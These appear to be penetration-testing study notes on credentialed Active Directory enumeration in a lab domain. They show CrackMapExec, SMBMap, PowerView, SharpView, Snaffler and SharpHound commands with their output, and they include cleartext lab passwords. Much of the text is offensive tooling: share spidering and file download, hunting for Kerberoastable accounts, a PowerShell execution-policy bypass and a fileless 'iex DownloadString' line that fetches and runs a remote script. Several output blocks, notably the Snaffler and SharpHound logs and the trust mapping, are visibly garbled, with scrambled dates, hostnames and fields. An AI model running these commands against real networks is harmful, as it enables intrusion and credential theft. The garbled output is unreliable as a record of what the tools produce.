Credentialed Enumeration

  • Access: A Windows attack host (e.g., ACADEMY-EA-MS01) with domain credentials (e.g., forend:Klmcargo2).

  • Target: Domain Controller (e.g., 172.16.5.5, ACADEMY-EA-DC01) and other hosts (e.g., ACADEMY-EA-FILE).

Credentialed Enumeration Linux

CrackMapExec (CME)

Domain User Enumeration

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-03-29 12:29:14.476567
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm                        badpwdcount: 0 baddpwdtime: 2022-04-09 23:04:58.611828
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\krbtgt                         badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\htb-student                    badpwdcount: 0 baddpwdtime: 2022-03-30 16:27:41.960920
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\avazquez                       badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395

Domain Group Enumeration

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain group(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Administrators                           membercount: 3
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Users                                    membercount: 4
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Guests                                   membercount: 2
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Print Operators                          membercount: 0
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Backup Operators                         membercount: 1
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Replicator                               membercount: 0
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Domain Admins                            membercount: 19
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Domain Users                             membercount: 0
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Contractors                              membercount: 138
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Accounting                               membercount: 15
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Engineering                              membercount: 19
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Executives                               membercount: 10
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Human Resources                          membercount: 36

Logged-On Users

C:\mrci0x1> sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [+] Enumerated loggedon users
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\clusteragent              logon_server: ACADEMY-EA-DC01
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\lab_adm                   logon_server: ACADEMY-EA-DC01
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\svc_qualys                logon_server: ACADEMY-EA-DC01
SMB         172.16.5.130    445    ACADEMY-EA-FILE  INLANEFREIGHT\wley                      logon_server: ACADEMY-EA-DC01

Share Enumeration

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated shares
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Share           Permissions     Remark
SMB         172.16.5.5      445    ACADEMY-EA-DC01  -----           -----------     ------
SMB         172.16.5.5      445    ACADEMY-EA-DC01  ADMIN$                          Remote Admin
SMB         172.16.5.5      445    ACADEMY-EA-DC01  C$                              Default share
SMB         172.16.5.5      445    ACADEMY-EA-DC01  Department Shares READ            
SMB         172.16.5.5      445    ACADEMY-EA-DC01  IPC$            READ            Remote IPC
SMB         172.16.5.5      445    ACADEMY-EA-DC01  NETLOGON        READ            Logon server share 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  SYSVOL          READ            Logon server share 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  User Shares     READ            
SMB         172.16.5.5      445    ACADEMY-EA-DC01  ZZZ_archive     READ

Spidering Shares

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Started spidering plus with option:
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]        DIR: ['print$']
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]        EXT: ['ico', 'lnk']
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]       SIZE: 51200
SPIDER_P... 172.16.5.5      445    ACADEMY-EA-DC01  [*]     OUTPUT: /tmp/cme_spider_plus

C:\mrci0x1> head -n 10 /tmp/cme_spider_plus/172.16.5.5.json
{
    "Department Shares": {
        "Accounting/Private/AddSelect.bat": {
            "atime_epoch": "2022-03-31 14:44:42",
            "ctime_epoch": "2022-03-31 14:44:39",
            "mtime_epoch": "2022-03-31 15:14:46",
            "size": "278 Bytes"
        },
        "Accounting/Private/ApproveConnect.wmf": {
            "atime_epoch": "2022-03-31 14:45:14"
        }
    }
}

SMBMap

Share Enumeration

C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
[+] IP: 172.16.5.5:445	Name: inlanefreight.local                               
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
	User Shares                                       	READ ONLY	
	ZZZ_archive                                       	READ ONLY

Recursive Directory Listing

C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
[+] IP: 172.16.5.5:445	Name: inlanefreight.local                               
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Department Shares                                 	READ ONLY	
	.\Department Shares\*
	dr--r--r--                0 Thu Mar 31 15:34:29 2022	.
	dr--r--r--                0 Thu Mar 31 15:34:29 2022	..
	dr--r--r--                0 Thu Mar 31 15:14:48 2022	Accounting
	dr--r--r--                0 Thu Mar 31 15:14:39 2022	Executives
	dr--r--r--                0 Thu Mar 31 15:14:57 2022	Finance
	dr--r--r--                0 Thu Mar 31 15:15:04 2022	HR
	dr--r--r--                0 Thu Mar 31 15:15:21 2022	IT
	dr--r--r--
            0 Thu Mar 31 15:15:14 2022	Marketing
dr--r--r--                0 Thu Mar 31 15:15:30 2022	Sales

Downloading File from Share

C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' -r 'Accounting/Private/AddSelect.bat' -A
[+] Downloading AddSelect.bat
[+] File saved to: ./AddSelect.bat

CrackMapExec Credentials Validation

C:\mrci0x1> crackmapexec smb 172.16.5.5 -u administrator -p "P@ssw0rd123"
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] ACADEMY-EA-DC01\administrator:P@ssw0rd123
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)

Credentialed Enumeration - from Windows

ActiveDirectory PowerShell Module

Check Available Modules

PS C:\mrci0x1> Get-Module
ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   3.1.0.0    Microsoft.PowerShell.Utility        {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script     2.0.0      PSReadline                          {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Import Module

PS C:\mrci0x1> Import-Module ActiveDirectory
PS C:\mrci0x1> Get-Modul
ModuleType Version    Name                                ExportedCommands
---------- -------    ----                                ----------------
Manifest   1.0.1.0    ActiveDirectory                     {Add-ADCentralAccessPolicyMember, Add-ADComputerServiceAcc...
Manifest   3.1.0.0    Microsoft.PowerShell.Utility        {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script     2.0.0      PSReadline                          {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Domain Information

PS C:\mrci0x1> Get-ADDomain
AllowedDNSSuffixes                 : {}
ChildDomains                       : {LOGISTICS.INLANEFREIGHT.LOCAL}
ComputersContainer                 : CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
DeletedObjectsContainer            : CN=Deleted Objects,DC=INLANEFREIGHT,DC=LOCAL
DistinguishedName                  : DC=INLANEFREIGHT,DC=LOCAL
DNSRoot                            : INLANEFREIGHT.LOCAL
DomainControllersContainer         : OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
DomainMode                         : Windows2016Domain
DomainSID                          : S-1-5-21-3842939050-3880317879-2865463114
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=INLANEFREIGHT,DC=LOCAL
Forest                             : INLANEFREIGHT.LOCAL
InfrastructureMaster               : ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
LastLogonReplicationInterval       :
LinkedGroupPolicyObjects           : {cn={DDBB8574-E94E-4525-8C9D-ABABE31223D0},cn=policies,cn=system,DC=INLANEFREIGHT,
                                     DC=LOCAL, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=INLA

User Enumeration (Kerberoastable Accounts)

PS C:\mrci0x1> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
DistinguishedName    : CN=adfs,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled              : True
GivenName            : Sharepoint
Name                 : adfs
ObjectClass          : user
ObjectGUID           : 49b53bea-4bc4-4a68-b694-b806d9809e95
SamAccountName       : adfs
ServicePrincipalName : {adfsconnect/azure01.inlanefreight.local}
SID                  : S-1-5-21-3842939050-3880317879-2865463114-5244
Surname              : Admin
UserPrincipalName    :

DistinguishedName    : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled              : True
GivenName            : Jessica
Name                 : BACKUPAGENT
ObjectClass          : user
ObjectGUID           : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName       : backupagent
ServicePrincipalName : {backupjob/veam001.inlanefreight.local}
SID                  : S-1-5-21-3842939050-3880317879-2865463114-5220
Surname              : Systemmailbox 8Cc370d3-822A-4Ab8-A926-Bb94bd0641a9

Trust Relationships

PS C:\mrci0x1> Get-ADTrust -Filter *
Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : LOGISTICS.INLANEFREIGHT.LOCAL
ObjectClass             : trustedDomain
ObjectGUID              : f48a1169-2e58-42c1-ba32-a6ccb10057ec
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=INLANEFREIGHT,DC=LOCAL
Target                  : LOGISTICS.INLANEFREIGHT.LOCAL
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

Group Enumeration

PS C:\mrci0x1> Get-ADGroup -Filter * | select name
name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access

Detailed Group Info

PS C:\mrci0x1> Get-ADGroup -Identity "Backup Operators"
DistinguishedName : CN=Backup Operators,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Backup Operators
ObjectClass       : group
ObjectGUID        : 6276d85d-9c39-4b7c-8449-cad37a8abc38
SamAccountName    : Backup Operators
SID               : S-1-5-32-551

Group Membership

PS C:\mrci0x1> Get-ADGroupMember -Identity "Backup Operators"
distinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
name              : BACKUPAGENT
objectClass       : user
objectGUID        : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName    : backupagent
SID               : S-1-5-21-3842939050-3880317879-2865463114

PowerView

User Information

PS C:\mrci0x1> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
name                 : Matthew Morgan
samaccountname       : mmorgan
description          :
memberof             : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Shared Calendar
                       Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Printer Access,OU=Security
                       Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File Share H Drive,OU=Security
                       Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL...}
whencreated          : 10/27/2021 5:37:06 PM
pwdlastset           : 11/18/2021 10:02:57 AM
lastlogontimestamp   : 2/27/2022 6:34:25 PM
accountexpires       : NEVER
admincount           : 1
userprincipalname    : mmorgan@inlanefreight.local
serviceprincipalname :
mail                 :
useraccountcontrol   : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH

Group Membership

PS C:\mrci0x1> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : svc_qualys
MemberDistinguishedName : CN=svc_qualys,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-5613

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : sp-admin
MemberDistinguishedName : CN=Sharepoint Admin,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-5228

Trust Enumeration

PS C:\mrci0x1> Get-DomainTrustMapping
SourceName      : INLANEFREIGHTLOGN.LOCAL
TargetName      : WINDOWS_ACTIVE_LOGISTICS.INLANEFREIGHT.REIGHTLOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 6:20:22 PM
WhenChanged     : 2/26/2022 11:55:55 PM

SourceName      : INLANEFREIGHT.STLOCAL
TargetName      : LOGISTICSFREIGHT.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
### Membership Memberships

Local Admin Access

PS C:\mrci0x1> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
ComputerName    IsAdmin
------------    -------
ACADEMY-EA-MS01    True 

Kerberoastable Accounts

PS C:\mrci0x1> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
serviceprincipalname                          samaccountname
--------------------                          adfs---------
adfsconnect/azure01.inlanefreight.local       : adfs
backupjob/veam001.inlanefreight.local         : backupagent
d0wngrade/kerberoast.inlanefreight.local      : d0wngrade
kadmin/changepw                               : krbtgt
MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433 : sqldev
MSSQLSvc/SPSJDB.inlanefreight.local:1433      : sqlprod
MSSQLSvc/SQL-CL01-01inlanefreight.local:49351  : sqlqa
sts/inlanefreight.local                       : solarwindsmonitor
testspn/kerberoast.inlanefreight.local        : testspn
testspn2/kerberoast.inlanefreight.local       : testspn2

SharpView

User Enumeration

PS C:\mrci0x1> .\SharpView.exe Get-DomainUser -Identity forend
[Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
[Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=forend)))
objectsid                      : {S-1-5-21-3842939050-29-2865463114-5614}
samaccounttype                : USER_OBJECT
objectguid                     : 53264142-47ab
useraccountcontrol              : OBJECT_4
accountexpires                 : 12/31/1600 4:00:00 PM
lastlogon                      : 4/18/2022 1:01:21 PM
lastlogontimestamp             : 4/9/2022 1:33:21 PM
pwdlastset                    : 2/28/2022 12:31:45 PM
lastlogoff                    : 12/31/1600 4:00:00
badpasswordtime                : 4/5/2022 7:09:07 AM
name                          : forend user
distinguishedname              : AN:forend,OU=CNC=IT,OU=HQ-NYC,
                 : OU=Employees,OU,DC=INLANEFREIGHT,DC=LOCAL
whencreated                   : 2/28/2022 8:03:45 PM
whenchanged                   : 4/9/2022 8:33:21 PM
samaccountname                : forend
memberof                      : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL,DC=Users, CN=SShared Calendar,OU=Security,DC=Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=PPurchase Access,OU=Security,DC=Users
                        DC=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File,OU=SSecurity Share Drive,
                        OU,DC=Users,DC=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=FFile Share Drive,
                          OU=SecGroup,OU=Corp,DC=INDC,DC=LANEFREIGHT,DC=LOCAL}
cn                             : {forend}

Snaffler

Execution Command

PS C:\mrci0x1> .\Snaffler.exe -d INLANEFREIGHT -s -v data
 .::::::.:::::..    ::::.  ::::.    .-:::::'.-:::::':::::::    .,::::::: :::::::..:.
;;;:::::  ``;;;:::::  ,  `;;;:::;;   ;;;:'''' ;;;:'''' ;;;;    ;;;:::::'''' ;;;:::;;;:::;;;;
'[==/[[[@, [[[[[. '[[@ .[[@ '[[@, [[[@@==, [[[@@== [[[@@@     [[c@ccc   [[[,/c[[['@'
  '''    $ @@@ 'Y$c@@c@@@cc@@@c`@@$'`` `@@$'`` @@'     @@""   $$$$@@c
  88b    dP@  @@@    Y@@ 888   @@@,888     @@@   o88oo,.__@@@oo,__ 888b@@@b'88bo,
  'YMmMY'   :MMM     YM YMM   :@@ '@@,    '@@@,  ''''YUMMMYUM@@'@@MMMM@   'MMM'
                         by l0ss and Sh@r@ - - - github.com/SnaffCon/Snaffler

2022-03-31 12:16:54 -07:00 [Share]] {D}:(\\(\\(\\ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL\ADMIN$:($)
2022-03-31-12 12:16:54 -07:00:00 [SShare] {AddD}:(\\(\\ACADEMY-EA-MS01.INLANEFREIGHT.MS01LOCAL\CC$:($)
2022-03-12:16:54 -073-31 12:00 [Share]: {Add}(\\(\\ACDEMY-EA-MXMY.INLANEFMY.LOCALTY\01:address)
2022-03-12-31 16:54 -07:16:00 [Share]: {Add}(\\A(\CADEMY-EA-DC01.INLANEFREIGHT.LOCAL\TDepartment SShares)
2022-03-12-31-16:54-07:16:00:00 [SShare] {Add}: (\\(\ACADEMY-EA-DC01.INLANEFREIGHT.FREIGHTLOCAL\Users S\Share)
2022-03-12-12 31-16-17:54-07:00:00: [SShare] {Add}: (\\(\ACADEMY-EAEA-DC01.INLANEFREIGHT.FREIGHT.LOCAL\ZZZ_archiveZ))
2022-03-31-12:17:18-07-31 17:00-12: [Share]] :{C15}(\\AC(\ADEMY-EA-CAC01.INLANEFACIGHT.YEALOCAL\CertTEnroll)
2022-03-12-31:17:19-07-17:00:00 [FFile] {DBlack}<KEEP BLACK_EXACT|RX|A\.kAdb$|289B|3/3B|3/31/2022 122:09:22 PM>(\\AC(\ADEMY-EA-DC01.DE.INLANEFREIGHT.LOCALTY\Department Shares\S\IT\InfosecInf\GroupBackup.kdb) .kAdb
2022-03-12-31:17-32:19-07:00:00: [File] {R[DAdd}|>R|^\<.s\.key$|k299B|3/31/2022 122:05:33/31/ PM>(\\A(\CADEMY-EA-DC01.TADEINLANEFREIGHT.LOCALLO\TDepartment Shares\IT\S\InfosecInf\owShareReset.key) .ks
ey
2022-03-12-31:17:19-32-07:17:00:00 [SShare] :{AddG}(\\A(\CADEMY-EA-FILE.INLANEFREIGHT.FREIGHT.LOCALTY.YEAL\UpdateServicesPackagesPackage)
2022-03-12:17:31-32-07:00:00 [FFile] {DBlack<KB}|RACK|\<.^\.kwallet$|kwalletD|302B|3/2B|31/2022 122:04:32 PM/ 3/31>(\\(A\CADEMY-EA-DC01.DE.INLANEFREIGHT.FREIGHTLOCAL\TY\DepartmentShare S\Shares\IT\InfosecI\T\WriteUse.kdwallet) .kwallet
2022-03-12:17:31-32-07:00:00:00 [FFile] {R[DAdd}|R>|^\<.s\.k\.ey$|k$|298B|3B|31/298 2022/ 122:05:31 PM/ 3/00>(\\(A(\CADEMY-EA-D.\C01.INLANEFREIGHT.FREIGHT.LOCALTY\Y\Department S\Shares\IT\InfosecI\ProtectStep.tkey) .ks
2022-03-12:31:17-32-07:00:00: [FFile] {DBlackK}|<KBLACK_EXACT_B|RX|\.p\.ppk$|p$|D|275B|3/2B|31/2022 17:04:40: PM3/ 3/31>(\\(A\CADEMY\(-EA-DAC01.DE.INLANEFREIGHT.FREIGHT.LOCALTY\Department S\Shares\IT\S\InfosecInf\StopTrace.Tp) .ppk
2022-03-12:31:17-32-07:00:00:00 [FFile] {R[DAdd}|:R>|^<\.s\.k\.ey$|k$|ey|301B|3B|31/2022 122:09:31:17: PM3/ 3/3> (\\A(\CADEMY-EA|\-D.DE.INLANEC01.FREIGHT.LOCALTYME\Y\Department S\Share\IT\Shares\I\TInfosec I\WaitClear.nfkey) .ksy
2022-12-31:17-32-07:00:00: [FFile] {R[DAdd}|:R> R|^<\.s\k\.sqld\.ump$|d$|$|312B|3/2B|31/2022 122:05:31:30 PM |/31> (\\A(\CADEMY-EA|\-D.DE.INLANEFREIGHT.DAC01.LOCALTY\ME\Department S\Share\IT\S\Developmenthares\DenyRedo.TSsqldump) .sql
2022-12-31:17-32-07:00:00:00 [F] {R[DAdd}|R>R|^R|^<\.s\.s\.qldump$|d$||$|310B|3B|/31/2022| 122:05:31:02/ PM3/ |31> (\A\\(A\CADEMY-EA|-D.DE.INLANEFREIGHT.DC01|.LOCALTY\ME\Y\Department| S\Share\IT\Development\S\AddPublish.tssqldump)
2022-12-31:17-32-07:00:00 [SShare] [:{AddG}]({\\(A\CADEMY-EA-FILE.INLANEFREIGHT.FREIGHT|.YLOCAL\WsusContentC\ontenters)
})
2022-12-31:12:17-32-07:00:00: [FFile] {R[DAdd}|:R>R|^<\.^|^s\.mdf$|f|$|297B|$|3/31/2022| 12:09:31:14/ PM

BloodHound (SharpHound)

Data Collection

PS C:\> .\SharpHound.exe -c All --zipfilename ILFREIGHT
2022-04-18T13:58:22.1163680-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Group, LocalGroup, OU, Session, LoggedOn, Groups, Trusts, Container, Group, ACLs, RDP, Object, DCOM, Group, SPNs, Targets, PSRemote
2022-04-17:58:22.1163680-07-17:00:00|IINFORMATIONN|Initializing| Sharp|Zound at 1:17 PM |on 4/17/2022
2022-04-17-17:58:22.678901-07-00:00|IINFORMATION|N|Flags:: FormationForm, LocalAdmin, GLocalGroup, Form, Sessions, LoggedOn, STrusts, Group, Containers, ACL, T, RDGroup, ObjectP, DCOMs, Group, SPN, NS, Target, SPS, PSRem
2022-04-17:58-23:085901.1206-07:00:00
|INFORMATION|N|Beginning: LDAPAP Search for IADLANEFREIGHT.LOLOCAL
2022-04-17:58:53-07.91301-00:00 [|SINFORMATIONT|:0|Status|:0 objects| (+0 0)/s |--| Using| (67 MB R)AM
2022-04-17:59:15-08.788291-07:00:00|IINFORMATION|N|Producer: Has finished|, |closing, LDAPAP channel|
2022-04-17:59:16-17.178901-07:00:00|IINFORMATION|N|LDAPAP channel| closed,:| waiting| forW consumers| 
2022-04-17:59:23-08.928901-08:00:00|IINFORMATION|N|S:T|: 37793 |objects (+3793 63.31667)/s |--|-- Using| 112 MB R|AM
2022-04-17:59:45-09.4132861-07:00:00|IINFORMATION|N|C:onsumer| finished|, |closing| output| channelC|
Closing| writers| 
2022-04-17:59:45-09.4601086-07:00:00|IINFORMATION|N|Output|: channel| closed|,| waiting| forW output| task| toT complete| 
2022-04-17:59:45-09.8663528-07:00:00|IINFORMATION|N|S:T|: 38079 |objects| finished| (+16 46.451)|/s |--|-- Using-| 110 MB R|AM
2022-04-17:59:45-09.8663528-07:00:00|IINFORMATION|N|E:numeration| finished| in 00:01:17.7919186
2022-04-17:59:46-09.3663660-07:00:00|IINFORMATION|N|Sharp|ZHound| Enumeration|: CCompleted!| at 1:17 PM |on 4/17/2022!| Happy| GraphingG

Launch GUI

PS C:\mrci0x1> bloodhound

Living Off the Land

Basic Host Information Commands

Command

Command Itself

Small Description

Hostname

hostname

Show machine name.

OS Version

[System.Environment]::OSVersion.Version

Display OS version and revision (PowerShell).

Installed Patches

wmic qfe get Caption,Description,HotFixID,InstalledOn

List installed patches and hotfixes.

Network Config

ipconfig /all

Show full network adapter configurations.

Environment Variables (CMD)

set

List environment variables (from CMD).

Domain Name

echo %USERDOMAIN%

Show domain name (CMD).

Logon Server

echo %logonserver%

Show domain controller used for logon (CMD).

System Info

systeminfo

Full host summary (OS, HW, domain, patches, etc.).


PowerShell Recon & Execution

Command

Command Itself

Small Description

List Modules

Get-Module

List available PowerShell modules.

Execution Policy

Get-ExecutionPolicy -List

Show execution policy for each scope.

Bypass Execution Policy

Set-ExecutionPolicy Bypass -Scope Process

Temporarily bypass execution policy for current session.

Environment Variables (PowerShell)

`Get-ChildItem Env:

Format-Table Key,Value`

PowerShell History

Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Show user’s PowerShell command history (may leak credentials/scripts).

Fileless Execution

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>"

Download & execute remote script in memory (fileless execution).


Firewall Configuration

PS C:\mrci0x1> netsh advfirewall show allprofiles
Domain Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable

Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096

Windows Defender Status

C:\mrci0x1> sc query windefend
SERVICE_NAME: windefend
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\mrci0x1> Get-MpComputerStatus
AMEngineVersion                  : 1.1.19000.8
AMProductVersion                 : 4.18.2202.4
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.2202.4
AntispywareEnabled               : True
AntispywareSignatureAge          : 0
